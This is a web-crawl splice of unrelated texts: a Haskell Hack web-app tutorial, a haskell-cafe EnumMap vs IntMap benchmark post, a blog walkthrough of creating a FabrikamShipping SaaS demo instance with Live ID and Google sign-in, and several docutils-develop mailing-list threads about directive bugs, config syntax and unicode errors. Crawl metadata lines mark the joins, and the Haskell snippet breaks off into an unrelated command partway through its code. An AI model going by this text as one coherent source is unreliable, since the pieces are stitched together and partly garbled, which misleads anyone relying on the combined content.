cabal install hack-handler-happstack
Create a Hack app
put the following code in
src/Main.hs
import Hack import Hack.Handler.Happstack import Data.ByteString.Lazy.Char8 (pack) app :: Application app = \env -> return $ Response { status = 200 , headers = [ ("Content-Type", "text/plain") ] , body = pack "Hello World" } main = run app
run
ghc --make -O2 Main.hs ./Main
It should be running on now.
Middleware
demo usage of middleware
install hack-contrib:
cabal install happy cabal install hack-contrib
put the following in
Main.hs. This code uses the
URLMap middleware to route both
/hello and
/there to the
hello application.
import Hack import Hack.Handler.Happstack import Hack.Contrib.Utils import Hack.Contrib.Middleware.URLMap import Data.ByteString.Lazy.Char8 (pack) import Data.Default hello :: Application hello = \env -> return $ def {body = pack $ show env, status = 200} app :: Application app = url_map [("/hello", hello), ("/there", hello)] it's simply as:
cabal install linked_lib --reinstall | https://hackage.haskell.org/package/hack-2009.10.30 | CC-MAIN-2016-40 | refinedweb | 310 | 50.43 |
There exists a small but measurable performance hit for at least one test case (using Int as keys, obviously). Perhaps the bias would be the other way if we were comparing EnumMap to an IntMap wrapped with to/from Enum. Thomas -- Using Data.IntMap [tommd at Mavlo Test]$ ghc --make -O2 im.hs [1 of 1] Compiling Main ( im.hs, im.o ) Linking im ... [tommd at Mavlo Test]$ ./im buildMap: 0.625563s lookupMap: 0.176478s [tommd at Mavlo Test]$ ./im buildMap: 0.613668s lookupMap: 0.174151s [tommd at Mavlo Test]$ ./im buildMap: 0.607961s lookupMap: 0.175584s -- Using Data.EnumMap [tommd at Mavlo Test]$ vi im.hs [tommd at Mavlo Test]$ ghc --make -O2 im.hs [1 of 1] Compiling Main ( im.hs, im.o ) Linking im ... [tommd at Mavlo Test]$ ./im buildMap: 0.705458s lookupMap: 0.229307s [tommd at Mavlo Test]$ ./im buildMap: 0.71757s lookupMap: 0.231273s [tommd at Mavlo Test]$ ./im buildMap: 0.685333s lookupMap: 0.23883s Code (sorry, its ugly I know) {-# LANGUAGE BangPatterns #-} module Main where import Data.Time import qualified Data.EnumMap as E type IntMap = E.EnumMap Int -- import qualified Data.IntMap as E -- type IntMap = E.IntMap main = do bench "buildMap" buildMap !e <- buildMap bench "lookupMap" (lookupMap e) bench str func = do start <- getCurrentTime !x <- func finish <- getCurrentTime let diff = diffUTCTime finish start putStrLn $ str ++ ":\t" ++ (show diff) keys = [0..1000000] buildMap :: IO (IntMap Int) buildMap = do return $ go keys keys E.empty where go [] _ !m = m go _ [] !m = m go (k:ks) (e:es) m = go ks es (E.insert k e m) lookupMap m = do check keys m where check [] _ = return () check (k:ks) m = if (E.lookup k m /= Just k) then error "blah" else check ks m On Sat, Aug 8, 2009 at 4:02 PM, John Van Enk<vanenkj at gmail.com> wrote: > What if we say that Enum a generalization, rather than a wrapper, of Int? > > If the benchmarks are even, is there a reason to use the more specific > structure rather than the general one? I don't know if Enum being > "more complex" outweighs the benefits of it being "more general" (if > the EnumMap matches IntMap for speed). > > Thoughts? > > On Sat, Aug 8, 2009 at 6:11 PM, Henning > Thielemann<lemming at henning-thielemann.de> wrote: >> >>. >> >> > _______________________________________________ > Haskell-Cafe mailing list > Haskell-Cafe at haskell.org > > | http://www.haskell.org/pipermail/haskell-cafe/2009-August/065052.html | CC-MAIN-2014-41 | refinedweb | 395 | 89.45 |
It’s been few months that we pulled the wrap off FabrikamShipping SaaS, and the response (example here) has been just great: I am glad you guys are finding the sample useful!
In fact, FabrikamShipping SaaS contains really a lot of interesting stuff and I am guilty of not having found the time to highlight the various scenarios, lessons learned and reusable little code gems it contains. Right now, the exploratory material is limited to the intro video, the recording of my session at TechEd Europe and the StartHere pages of the source code & enterprise companion packages.
We designed the online demo instance and the downloadable packages to be as user-friendly as we could, and in fact we have tens of people creating tenants every day, but it’s undeniable that some more documentation may help to zero on the most interesting scenarios. Hence, I am going to start writing more about the demo. Some times we’ll dive very deep in code and architecture, some other we’ll stay at higher level.
I’ll begin by walking you through the process of subscribing to a small business edition instance of FabrikamShipping: the beauty of this demo angle is that all you need to experience it is a browser, an internet connection and one or more accounts at Live, Google or Facebook. Despite of the nimble requirements, however, this demo path demonstrates many important concepts for SaaS and cloud based solutions: in fact, I am told it is the demo that most often my field colleagues use in their presentations, events and engagements.
Last thing before diving in: I am going to organize this as instructions you can follow for going thru the demo, almost as a script, so that you can get the big picture reasonably fast; I will expand on the details on later posts.
Subscribing to a Small Business Edition instance of FabrikamShipping
Let’s say that today you are Adam Carter: you work for Contoso7, a fictional startup, and you are responsible for the logistic operations. Part of the Contoso7 business entails sending products to their customers, and you are tasked with finding a solution for handling Contoso7’s shipping needs. You have no resources (or desire) to maintain software in-house for a commodity function such as shipping, hence you are on the hunt for a SaaS solution that can give you what you need just by pointing your browser to the right place.
Contoso7 employees are mostly remote; furthermore, there is a seasonal component in Contoso7 business which requires a lot of workers in the summer and significantly less stuff in the winter. As a result, Contoso7 does not keep accounts for those workers in a directory, but asks them to use their email and accounts from web providers such as Google, Live Id, or even Facebook.
In your hunt for the right solution, you stumble on FabrikamShipping: it turns out they offer a great shipping solution, delivered as a monthly subscription service to a customized instance of their application. The small business edition is super-affordable, and it supports authentication from web providers. It’s a go!
You navigate to the application home page at, and sign up for one instance.
As mentioned, the Small Business Edition is the right fit for you; hence, you just click on the associated button.
Before everything else, FabrikamShipping establishes a secure session: in order to define your instance, you’ll have to input information you may not want to share too widely! FabrikamShipping also needs to establish a business relationship with you: if you will successfully complete the onboarding process, the identity you use here will be the one associated to all the subscription administration activities.
You can choose to sign in from any of the identity providers offered above. FabrikamShipping trusts ACS to broker all its authentication need: in fact, the list of supported IPs comes from directly from the FabrikamShipping namespace in ACS. Pick any IP you like!
In this case, I have picked a live id. Note for the demoers: the identity you use at this point is associated to your subscription, and is also the way in which FabrikamShipping determines which instance you should administer when you come back to the management console. You can only have one instance associated to one identity, hence once you create a subscription with this identity you won’t be able to re-use the same identity for creating a NEW subscription until the tenant gets deleted (typically every 3 days).
Once you authenticated, FabrikamShipping starts the secure session in which you’ll provide the details of your instance. The sequence of tabs you see on top of the page represent the sequence of steps you need to go through: the FabrikamShipping code contains a generic provisioning engine which can adapt to different provisioning processes to accommodate multiple editions, and it sports a generic UI engine which can adapt to it as well. The flow here is specific to the small business edition.
The first screen gathers basic information about your business: the name of the company, the email address at which you want to receive notifications, which Windows Azure data center you want your app to run on, and so on. Fill the form and hit Next.
In this screen you can define the list of the users that will have access to your soon-to-appear application instance for Contoso7.
Users of a Small Business instance authenticate via web identity providers: this means that at authentication time you won’t receive a whole lot of information in form of claims, some times you’ll just get an identifier. However, in order to operate the shipping application every user need some profile information (name, phone, etc) and the level of access it will be granted to the application features (i.e., roles).
As a result, you as the subscription administrator need to enter that information about your users; furthermore, you need to specify for every user a valid email address so that FabrikamShipping can generate invitation emails with activation links in them (more details below).
In this case, I am adding myself (ie Adam Carter) as an application user (the subscription administrator is not added automatically) and using the same hotmail account I used before. Make sure you use an email address you actually have access to, or you won’t receive notifications you need for moving forward in the demo. Once you filled in all fields, you can click Add as New for adding the entry in the users’ list.
For good measure I always add another user for the instance, typically with a gmail or Facebook account. I like the idea of showing that the same instance of a SaaS app can be accessed by users coming from different IPs, something that before the rise of the social would have been considered weird at best
Once you are satisfied with your list of users, you can click Next.
The last screen summarizes your main instance options: if you are satisfied, you can hit Subscribe and get FabrikamShipping to start the provisioning process which will create your instance.
Note: on a real-life solution this would be the moment to show the color of your money. FabrikamShipping is nicely integrated with the Adaptive Payment APIs and demonstrates both explicit payments and automated, preapproved charging from Windows Azure. I think it is real cool, and that it deserves a dedicated blog post: also, in order to work it requires you to have an account with the PayPal developer sandbox, hence this would add steps to the flow: more reasons to defer it to another post.
Alrighty, hit Subscribe!
FabrikamShipping thanks you for your business, and tells you that your instance will be ready within 48 hours. In reality that’s the SLA for the enterprise edition, which I’ll describe in another post, for the Small Business one we are WAAAY faster. If you click on the link for verifying the provisioning status, you’ll have proof.
Here you entered the Management Console: now you are officially a Fabrikam customer, and you get to manage your instance.
The workflow you see above is, once again, a customizable component of the sample: the Enterprise edition one would be muuuch longer. In fact, you can just hit F5 a few times and you’ll see that the entire thing will turn green in typically less than 30 seconds. That means that your Contoso7 instance of FabrikamShipping is ready!
Now: what happened in those few seconds between hitting Subscribe and the workflow turning green? Quite a lot of things. The provisioning engine creates a dedicated instance of the app database in SQL Azure, creates the database of the profiles and the various invitation tickets, add the proper entry in the Windows Azure store which tracks tenants and options, creates dedicated certificates and upload them in ACS, creates entries in ACS for the new relying party and issuer, sends email notifications to the subscriber and invites to the users, and many other small things which are needed for presenting Contoso7 with a personalized instance of FabrikamShipping. There are so many interesting things taking place there that for this too we’ll need a specific post. The bottom line here is: the PaaS capabilities offered by the WIndows Azure platform are what made it possible for us to put together something so sophisticated as a sample, instead of requiring the armies of developers you’d need for implementing features like the ones above from scratch. With the management APIs from Windows Azure, SQL Azure and ACS we can literally build the provisioning process as if we’d be playing with Lego blocks.
Activating One Account and Accessing the Instance
The instance is ready. Awesome! Now, how to start using it? The first thing Adam needs to do is check his email.
Above you can see that Adam received two mails from FabrikamShipping: let’s take a look to the first one.
The first mail informs Adam, in his capacity of subscription manager, that the instance he paid for is now ready to start producing return on investment. It provides the address of the instance, that in good SaaS tradition is of the form http://<applicationname>/<tenant>, and explains how the instance work: here there’s the instance address, your users all received activation invitations, this is just a sample hence the instance will be gone in few days, and similar. Great. If we want to start using the app, Adam needs to drop the subscription manager hat and pick up the one of application user. For this, we need to open the next message.
This message is for Adam the user. It contains a link to an activation page (in fact we are using MVC) which will take care of associating the record in the profile with the token Adam will use for the sign-up. As you can imagine, the activation link is unique for every user and becomes useless once it’s been used. Let’s click on the activation link.
Here we are already on the Contoso7 instance, as you can see from the logo (here I uploaded a random image (not really random, it’s the logo of my WP7 free English-Chinese dictionary app (in fact, it’s my Chinese seal
))). Once again, the list of identity providers is rendered from a list dynamically provided by the ACS: although ACS provides a ready-to-use page for picking IPs, the approach shown here allows Fabrikam to maintain a consistent look and feel and give continuity of experience, customize the message to make the user aware of the significance of this specific step (sign-up), and so on. Take a peek at the source code to see how that’s done.
Let’s say that Adam picks live id: as he is already authenticated with it from the former steps, the association happens automatically.
The page confirms that the current account has been associated to the profile; to prove it, we can now finally access the Contoso7 instance. We can go back to the mail and follow the provided link, or use directly the link in the page here.
This is the page every Contoso7 user will see when landing on their instance: it may look very similar to the sign-up page above, but notice the different message clarifying that this is a sign-in screen.
As Adam is already authenticated with Live ID, as soon as he hits the link he gets redirected to ACS, gets a token and uses it to authenticate with the instance. Behind the scenes, Windows Identity Foundation uses a custom ClaimsAuthenticationManager to shred the incoming token: it verifies that the user is accessing the right tenant (tenant isolation is king), then retrieves form SQL Azure the profile data and adds them as claims in the current context (there are solid reasons for which we store those at the RP side, once again: stuff for another post). As a result, Adam gets all his attributes and roles dehydrated in the current context and the app can take advantage of claims based identity for customizing the experience and restrict access as appropriate. In practical terms, that means that Adam’s sender data are pre-populated: and that Adam can do pretty much what he wants with the app, since he is in the Shipping Manager role that he self-awarded to his user at subscription time.
In less than 5 minutes, if he is a fast typist, Adam got for his company a shipping solution; all the users already received instructions on how to get started, and Adam himself can already send packages around. Life is good!
Works with Google, too! And all the Others*
*in the Lost sense
Let’s leave Adam for a moment and let’s walk few clicks in the Joe’s mouse. If you recall the subscription process, you’ll remember that Adam defined two users: himself and Joe. Joe is on gmail: let’s go take a look to what he got. If you are doing this from the same machine as before: remember to close all browsers or you risk to carry forward existing authentication sessions!
Joe is “just” a user, hence he received only the user activation email.
The mail is absolutely analogous to the activation mail received by Adam: the only differences are the activation link, specific to Joe’s profile, and how gmail renders HTML mails.
Let’s follow the activation link.
Joe gets the same sign-up UI we observed with Adam: but this time Joe has a gmail account, hence we’ll pick the Google option.
ACS connects with google via the OpenID protocol: the UI above is what google shows you when an application (in this case the ACS endpoint used by FabrikamShipping) requests an attribute exchange transaction, so that Joe can give or refuse his consent to the exchange. Of course Joe knows that the app is trusted, as he got a headsup from Adam, and he gives his consent. This will cause one token to flow to the ACS, which will transform it and make it available for the browser to authenticate with FabrikamShipping. From now on, we already know what will happen: the token will be matched with the profile connected to this activation page, a link will be established and the ticket will be voided. Joe just joined the Contoso7’s FabrikamShipping instance family!
And now, same drill as before: in order to access the instance, all Joe needs to do is click on the link above or use the link in the notification (better to bookmark it).
Joe picks google as his IP…
..and since he flagged “remember this approval” at sign-up time, he’ll just see the page above briefly flashing in the browser and will get authenticated without further clicks.
And here we are! Joe is logged in the Contoso7 instance of FabrikamShipping.
As you can see in the upper right corner, his role is Shipping Creator, as assigned by Adam at subscription time. That means that he can create new shipments, but he cannot modify existing ones. If you want to double check that, just go through the shipment creation wizard, verify that it works and then try to modify the newly created shipment: you’ll see that the first operation will succeed, and the second will fail. Close the browser, reopen the Contoso7 instance, sign in again as Adam and verify that you are instead able to do both creation and modifications. Of course the main SaaS explanatory value of this demo is in the provisioning rather than the application itself, but it’s nice to know that the instances itself actually use the claims as well.
Aaand that’s it for creating and consuming Small Business edition instances. Seems long? Well, it takes long to write it down: but with a good form filler, I can do the entire demo walkthrough above well under 3 minutes. Also: this is just one of the possible path, but you can add your own spins & variations (for example, I am sure that a lot of people will want to try using facebook). The source code is fully available, hence if you want to add new identity providers (yahoo, ADFS instances or arbitrary OpenID providers are all super-easy to add) you can definitely have fun with it.
Now that you saw the flow from the customer perspective, in one of the next installments we’ll take a look at some of the inner workings of our implementation: but now… it’s Saturday night, and I better leave the PC alone before they come to grab my hair and drag me away from it
| https://blogs.msdn.microsoft.com/vbertocci/2011/02/12/fun-with-fabrikamshipping-saas-i-creating-a-small-business-edition-instance/ | CC-MAIN-2018-34 | refinedweb | 2,974 | 53.85 |
hei,
the problem:
method paragraph returns paragraph + system_messages
Replace.run checks that only one paragraph is returned
otherwise error("may contain a single paragraph only") is returned
problem 1:
paragraph returns content and system_messages in one list
problem 2:
directive.run returns either content or system_messages
usecase 1:
english roles work as fallback if language is different
but two system_messages are generated while this
1. role not found
2. fallback role used
in this case one becomes a correct content, but the system_messages
break it
usecase 2:
errors in directives, get ann aditional error("may contain a single
paragraph only")
the change ::
class Replace(Directive):
has_content = True
def run(self):
if not isinstance(self.state, states.SubstitutionDef):
raise self.error(
'Invalid context: the "%s" directive can only be used within '
'a substitution definition.' % self.name)
self.assert_has_content()
text = '\n'.join(self.content)
element = nodes.Element(text)
self.state.nested_parse(self.content, self.content_offset,
element)
# BUG 1830380 : element might contain [paragraph] + system_message(s)
# BUG 1830380 : could skip embedded messages, but then we loose them
- if ( len(element) != 1
- or not isinstance(element[0], nodes.paragraph)):
- messages = []
- for node in element:
- if isinstance(node, nodes.system_message):
- node['backrefs'] = []
- messages.append(node)
- error = self.state_machine.reporter.error(
- 'Error in "%s" directive: may contain a single paragraph '
- 'only.' % (self.name), line=self.lineno)
- messages.append(error)
- return messages
- else:
- return element[0].children
+ node = None
+ messages = []
+ for elem in element:
+ if not node and isinstance(elem, nodes.paragraph):
+ node = elem
+ elif isinstance(elem, nodes.system_message):
+ elem['backrefs'] = []
+ messages.append(elem)
+ else:
+ return [
+ self.state_machine.reporter.error(
+ 'Error in "%s" directive: may contain a
single paragraph '
+ 'only.' % (self.name), line=self.lineno) ]
+ if node:
+ return node.children
+ return messages
changes the behaviour to
usecase 1::
-: expected
+: output
<document source="test data">
<paragraph>
Test directive containing english role superscript.
BUG 1830380: the ERROR is an ERROR and the WARNING a
followup to the ERROR
+ <substitution_definition names="Na+">
+ Na
+ <superscript>
+ +
- <system_message level="1" line="4" source="test data" type="INFO">
- <paragraph>
- No role entry for "sup" in module
"docutils.parsers.rst.languages.fr".
- Using English fallback for role "sup".
- <system_message level="3" line="4" source="test data" type="ERROR">
- <paragraph>
- Error in "remplace" directive: may contain a single
paragraph only.
- <system_message level="2" line="4" source="test data" type="WARNING">
- <paragraph>
- Substitution definition "Na+" empty or invalid.
- <literal_block xml:
- .. |Na+| remplace:: Na\ :sup:`+`
<paragraph>
Le
<substitution_reference refname="Na+">
Na+
est l'ion sodium.
means we get rid of the ERROR, but we also loose the INFO and WARNING
usecase 2:
-: expected
+: output
<document source="test data">
- <system_message ids="id1" level="2" line="1" source="test data"
type="WARNING">
- <paragraph>
- Inline emphasis start-string without end-string.
- <system_message ids="id3" level="2" line="1" source="test data"
type="WARNING">
- <paragraph>
- Inline strong start-string without end-string.
- <system_message ids="id5" level="2" line="1" source="test data"
type="WARNING">
- <paragraph>
- Inline literal start-string without end-string.
<system_message level="3" line="1" source="test data" type="ERROR">
<paragraph>
- Error in "replace" directive: may contain a single paragraph only.
- <system_message level="2" line="1" source="test data" type="WARNING">
- <paragraph>
- Substitution definition "name" empty or invalid.
+ Substitution definition contains illegal element:
+ <literal_block xml:
+ <problematic ids="id2" refid="id1">
+ *
<literal_block xml:
.. |name| replace:: *error in **inline ``markup
means we get a better ERROR, but loose information details
any help ?
--
Hello,
in docutils/parsers/rst/__init__.py is class DirectiveError(Exception)
shouldnt reporter.error (and the like) be used instead ?
cheers
--
Hi Günter!
Last week (8 days ago) Guenter Milde wrote:
>> 3 days ago Guenter Milde wrote:
> I suppose the problem are "implicit" unicode -> str conversions that
> use the "ASCII, strict" encoding.
I thought that, too. But some tests on the command line showed this is
not the case. It's really the `print` which causes the problem.
Probably it's there where there is the conversion to ASCII which
fails.
> But maybe it is also the conversion in the join()
Unfortunately not.
> On 2011-04-16, Stefan Merten wrote:
>> Yes, I still have LANG=C...
>
>()
Doesn't change anything.
>>.
Then it could be removed.
If, however, people insist on using `sys.stderr` then may be it could
be wrapped?
>> Here are the hits
>> for `sys.stderr` in some core sources::
>
> ...
>
>> I guess all these places need to be fixed :-( .
>
> I am not sure. At least in case there is a pure ASCII string, nothing
> needs to be done.
True.
> Things change with substitutions that include
> parts of the document (which is generally an unicode object).
Yes.
> It would be wonderful, if you could prepare test cases for the Docutils
> test suite.
Good idea. I'm going to check whether I find my way through the tests.
Hints where to put this type of test to are welcome, however.
Grüße
Stefan
Bugs item #1830380, was opened at 2007-11-12 13:01: lpezard (lpezard)
Assigned to: Nobody/Anonymous (nobody)
Summary: Replace with role :sup: does not work with language_code: fr
Initial Comment:
Here is my original posting to docutils-user mailing list and David Goodger reply:
My posting:
-----------
I've tried the following replacements:
.. |Na+| replace:: Na\ :sup:`+`
Le |Na+| est l'ion sodium.
.. |K+| replace:: K\ :sup:`+`
Le |K+| est l'ion potassium
every thing works fine if I leave the language_code to en, but obviously this is french so that I change my docutils.conf to language_code: fr and then I obtain the following error:
test.txt:5: (ERROR/3) Error in "replace" directive: may contain a single paragraph only.
test.txt:5: (WARNING/2) Substitution definition "Na+" empty or invalid.
.. |Na+| replace:: Na\ :sup:`+`
test.txt:7: (ERROR/3) Undefined substitution referenced: "Na+".
It does not work for the first replacement |Na+| but works as expected for the second one |K+|. I must admit that I don't understand.
David Goodger's reply:
----------------------
I don't understand why the first replacement gives an error while the second one doesn't, either. But I found the root cause: Docutils isn't finding the role "sup", because it expects the French "exp" or
"exposant". If you're going to be using the French variant of Docutils, you should be using the French directive & role names too:
.. |Na+| remplace:: Na\ :exp:`+`
Le |Na+| est l'ion sodium.
.. |K+| remplace:: K\ :exp:`+`
Le |K+| est l'ion potassium
This works fine; no errors. For a "dictionary" of equivalencies, see . I don't know if these are documented somewhere else (they ought to be).
I don't understand, yet, why there's an error at all. There shouldn't be. The English directive names & role names should be fallback defaults. But I don't have time to solve it now.
Please file a bug on SourceForge so this doesn't get lost. Please include:
"A secondary bug is that an error in the "replace" directive isn't propagating through to the substitution definition error reporting."
----------------------------------------------------------------------
>Comment By: engelbert gruber (grubert)
Date: 2011-04-25 13:43
my reconstruction is:
witjh language!=en and reST:
..|X| replace:: \ :sup:`x`
in class Replace: the call to nested_parse returns [paragraph] +
system_message(s)
which results in the error may contain a single paragraph only.
I flagged some lines with "# BUG 1830380
but still do not know how to fix AND pass system_messages to Replace.run
caller.
----------------------------------------------------------------------
You can respond by visiting:):
On 2011-04-20, Arfrever Frehtes Taifersar Arahesis wrote:
> Users of some locales (e.g. cs_CZ.UTF-8) have been reproducing some problem=
> s with docutils and Python 2:
>
Can you please test, if this problem persists with the newest SVN
version or daily snapshot?
Error string encoding has been made more robust some days ago.
Günter
Dear list,
I cannot find documentation (nor the place in the source) explaining
the config file syntax for *list values* as expected, e.g. here:
_`strip_classes`
List of "classes" attribute values to remove from all elements in
the document tree.
.. WARNING:: Potentially dangerous; use with caution.
Default: disabled (None). Option: ``--strip-class``.
_`strip_elements_with_classes`
List of "classes" attribute values; matching elements to be
removed from the document tree.
.. WARNING:: Potentially dangerous; use with caution.
Default: disabled (None). Option: ``--strip-element-with-class``.
Can someone please give an example?
Günter
07.03.2011 18:35, Paul Bukhovko пишет:
> On Wed, Dec 22, 2010 at 05:11, PC <by.marcis@...> wrote:
>> 17.11.2010 19:41, Paul Bukhovko пишет:
>>>
>>> 11.11.2010 17:38, David Goodger пишет:
>>>>
>>>> On Thu, Nov 11, 2010 at 05:19, Paul Bukhovko<bukhovko@...> wrote:
>>>>>
>>>>> I want to translate 'Docutils' project page
>>>>> () to Belorussian language.
>>>>
>>>> I don't mind at all. Please go ahead.
>>>>
>>>>> Do you prefer email or IM for contact (if any questions regarding the
>>>>> translation arise)? What instant messaging client (if any) do you
>>>>> use? AIM,
>>>>> MSN, Sk.
>>>>
>>>
>>> Hi David,
>>>
>>> Was a pleasure to translate this page!
>>>
>>> Posted my Belorussian translation on
>>>. If you don't mind can you
>>> publish a tiny link with a text
>>>
>>> <a href="">Belorussian</a>
>>> or whatever you feel is right.
>
> I'm happy to see translations and localization. But I'm always busy.
> Who isn't? ;-)
>
> As I wrote.
>
> Please write to docutils-develop@..., where you'll probably
> get quicker action.
>
Greetings,
Can I ask you for a favor? Please place a tiny link back to the
translation, does not matters where on the page. Not being able to
announce it otherwise, I ask you for linking back to the translation to
spread the good news around the globe. If not completely contrary to
your principles and linking habits :)
--
Regards,
Paul Bukhovko
On 2011-04-18, Dave Kuhlman wrote:
> (1) Does this patch have the effect,
> under Python 3.2, of generating an .odt file containing unicode
> strings?
> (2) If so, wouldn't we actually want utf-8 as the encoding? Or does
> oowriter actually understand unicode?
Python 3 uses the `unicode` object for "generic" strings internally,
allowing encoding-independent representation of all Unicode characters.
Docutils uses `unicode` internally as well - but under Python 2 it needs
to explicitely decode things it reads and encode when writing (to disk or
stdout).
So no, this patch does not change the behaviour that the encoding of the
output file is governed by the config setting
output_encoding
The text encoding for output.
(see docutils/docs/user/config.html).
Günter
----- Original Message ----
> From: Arfrever Frehtes Taifersar Arahesis <arfrever.fta@...>
> To: Docutils Development <docutils-develop@...>
> Sent: Sat, April 9, 2011 4:22:48 PM
> Subject: [Docutils-develop] [PATCH] Support Python 3.2 in
>docutils/writers/odf_odt/__init__.py
>
> I'm attaching the patch, which adds support for Python 3.2 in
>docutils/writers/odf_odt/__init__.py.
> This patch is needed independently from the configparser-related patch.
>
>
>
>
> --
> Arfrever Frehtes Taifersar Arahesis
>
Arfrever -
I've applied your patch and checked it into the SVN repository.
Thank you.
However a question or two:
(1) Does this patch have the effect,
under Python 3.2, of generating an .odt file containing unicode
strings?
(2) If so, wouldn't we actually want utf-8 as the encoding? Or does
oowriter actually understand unicode?
I apologize that I do not understand the use of unicode in
Python 3 very well. I have a minimal understanding of
unicode and encodings even in Python 2.
- Dave
--
Dave Kuhlman
> posit=
> ion 0: ordinal not in range(128)
> >>> sys.stderr.encoding
> 'ANSI_X3.4-1968'
> Yes, I still have LANG=3DC....
>
Hi Günter!
Thanks for caring about this.
3 days ago Guenter Milde wrote:
> On 2011-04-04, Stefan Merten wrote:
>
>> The command ::
>
>> rst2xml.py --debug --traceback --input-encoding=utf-8 --output-encodi>> ng=utf-8 --error-encoding=utf-8 umlaut.rst /dev/null
>
>> on input file `umlaut.rst` ::
>
>> äöüÄÖÜß
>
>> crashes with a misleading error message::
>
> Actually, this is a Python bug. It should be fine with Python >= 2.6
I don't think so - at least not the last part::
$ python -V
Python 2.6.5
$ svn info
URL: svn+ssh://smerten@.../svnroot/repos/docutils/trunk
...
Revision: 6993
...
Last Changed Rev: 6993
Last Changed Date: 2011-03-20 18:20:36 +0100 (Sun, 20 Mar 2011)
crashes. This is before your patch but with Python 2.6.5.
> and with the workaround I commited yesterday:
Trial::
$ svn update
...
Updated to revision 7012.
Also crashes::
File "/home/stefan/lib/python/lib/docutils/docutils/statemachine.py", line 212, in run
% (self.line_offset, '\n| '.join(self.input_lines)))
UnicodeEncodeError: 'ascii' codec can't encode characters in position 51-57: ordinal not in range(128)
> Can you please test?
Done.
I think the problem is not in the Python problem you mentioned but in
the code at `docutils/docutils/statemachine.py:212`::
print >>sys.stderr, (
'\nStateMachine.run: input_lines (line_offset=%s):\n| %s'
% (self.line_offset, '\n| '.join(self.input_lines)))
IMHO the print statement causes the problem::
$ python
Python 2.6.5 (r265:79063, Apr 16 2010, 13:09:56)
position 0: ordinal not in range(128)
>>> sys.stderr.encoding
'ANSI_X3.4-1968'
Yes, I still have LANG=C...
With all the logging facilities Docutils has I guess it would be
feasible to use them instead of printing things simply out to
`sys.stderr`. However, this idiom is quite common. Here are the hits
for `sys.stderr` in some core sources::
./docutils/core.py:238: print >>sys.stderr, '\n::: Runtime settings:'
./docutils/core.py:239: print >>sys.stderr, pprint.pformat(self.settings.__dict__)
./docutils/core.py:241: print >>sys.stderr, '\n::: Document internals:'
./docutils/core.py:242: print >>sys.stderr, pprint.pformat(self.document.__dict__)
./docutils/core.py:244: print >>sys.stderr, '\n::: Transforms applied:'
./docutils/core.py:245: print >>sys.stderr, (' (priority, transform class, '
./docutils/core.py:247: print >>sys.stderr, pprint.pformat(
./docutils/core.py:253: print >>sys.stderr, '\n::: Pseudo-XML:'
./docutils/core.py:254: print >>sys.stderr, self.document.pformat().encode(
./docutils/core.py:263: print >>sys.stderr, '%s: %s' % (error.__class__.__name__, error)
./docutils/core.py:264: print >>sys.stderr, ("""\
./docutils/core.py:273: print >>sys.stderr, ('Exiting due to level-%s (%s) system message.'
./docutils/core.py:279: sys.stderr.write(
./docutils/frontend.py:323: default_error_encoding = sys.stderr.encoding or 'ascii'
./docutils/frontend.py:713: sys.stderr.write(self.not_utf8_error % (filename, filename))
./docutils/utils.py:85: `None` (implies `sys.stderr`; default).
./docutils/utils.py:108: stream = sys.stderr
./docutils/utils.py:143: stream = sys.stderr
./docutils/statemachine.py:210: print >>sys.stderr, (
./docutils/statemachine.py:218: print >>sys.stderr, ('\nStateMachine.run: bof transition')
./docutils/statemachine.py:228: print >>sys.stderr, (
./docutils/statemachine.py:236: print >>sys.stderr, (
./docutils/statemachine.py:248: print >>sys.stderr, (
./docutils/statemachine.py:261: print >>sys.stderr, (
./docutils/statemachine.py:285: print >>sys.stderr, \
./docutils/statemachine.py:442: print >>sys.stderr, (
./docutils/statemachine.py:450: print >>sys.stderr, (
./docutils/statemachine.py:457: print >>sys.stderr, (
./docutils/statemachine.py:491: print >>sys.stderr, '%s: %s' % (type, value)
./docutils/statemachine.py:492: print >>sys.stderr, 'input line %s' % (self.abs_line_number())
./docutils/statemachine.py:493: print >>sys.stderr, ('module %s, line %s, function %s'
./docutils/io.py:238: print >>sys.stderr, '%s: %s' % (error.__class__.__name__,
./docutils/io.py:240: print >>sys.stderr, ('Unable to open source file for '
./docutils/io.py:330: print >>sys.stderr, '%s: %s' % (error.__class__.__name__,
./docutils/io.py:332: print >>sys.stderr, ('Unable to open destination file for writing'
./docutils/io.py:370: print >>sys.stderr, '%s: %s' % (error.__class__.__name__,
./docutils/io.py:372: print >>sys.stderr, ('Unable to open destination file for writing '
I guess all these places need to be fixed :-( .
Grüße
Stefan
On 2011-04-14, Ryan Krauss wrote:
> from docutils.math import unimathsymbols2tex
> ImportError: cannot import name unimathsymbols2tex
> I just checked out the trunk. Should unimathsymbols2tex.py be in the
> trunk?
It should be. And it now is. Please excuse, it was late last night.
Thanks for reporting
Günter
I don't see unimathsymbols2tex.py in this directory:
On Thu, Apr 14, 2011 at 9:36 AM, Ryan Krauss <ryanlists@...> wrote:
>
On 2011-04-04, Stefan Merten wrote:
> The command ::
> rst2xml.py --debug --traceback --input-encoding=3Dutf-8 --output-encodi=
> ng=3Dutf-8 --error-encoding=3Dutf-8 umlaut.rst /dev/null
> on input file `umlaut.rst` ::
> =E4=F6=FC=C4=D6=DC=DF
>" an=
> :-( .
Actually, this is a Python bug. It should be fine with Python >= 2.6
and with the workaround I commited yesterday:
- Work around Issue2517_ to allow unicode messages in `Exception`
instances with Python < 2.6.
.. _Issue2517:
Can you please test?
Günter
Hi!
The command ::
rst2xml.py --debug --traceback --input-encoding=utf-8 --output-encoding=utf-8 --error-encoding=utf-8 umlaut.rst /dev/null
on input file `umlaut.rst` ::
äöüÄÖÜß" :-( .
Grüße
Stefan
Bugs item #3149845, was opened at 2011-01-02 13:22
Message generated for change (Comment added) made by abadger1999
You can respond by visiting:
Please note that this message will contain a full copy of the comment thread,
including the initial issue submission, for this request,
not just the latest update.
Category: None
Group: None
Status: Open
Resolution: None
Priority: 5
Private: No
Submitted By: Toshio Kuratomi (abadger1999)
Assigned to: Nobody/Anonymous (nobody)
Summary: docutils broken on python-3.2 due to configparser changes
Initial Comment:
Python-3.2 replaces ConfigParser with SafeConfigParser. One of the ramifications of this is that the code now checks that any value set() on ConfigParser is a string. This leads to tracebacks like this from running the unittests:
======================================================================
ERROR: test_odt_tables1 (test_writers.test_odt.DocutilsOdtTestCase)
----------------------------------------------------------------------
Traceback (most recent call last):
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/test/test_writers/test_odt.py", line 156, in test_odt_tables1
self.process_test('odt_tables1.txt', 'odt_tables1.odt',
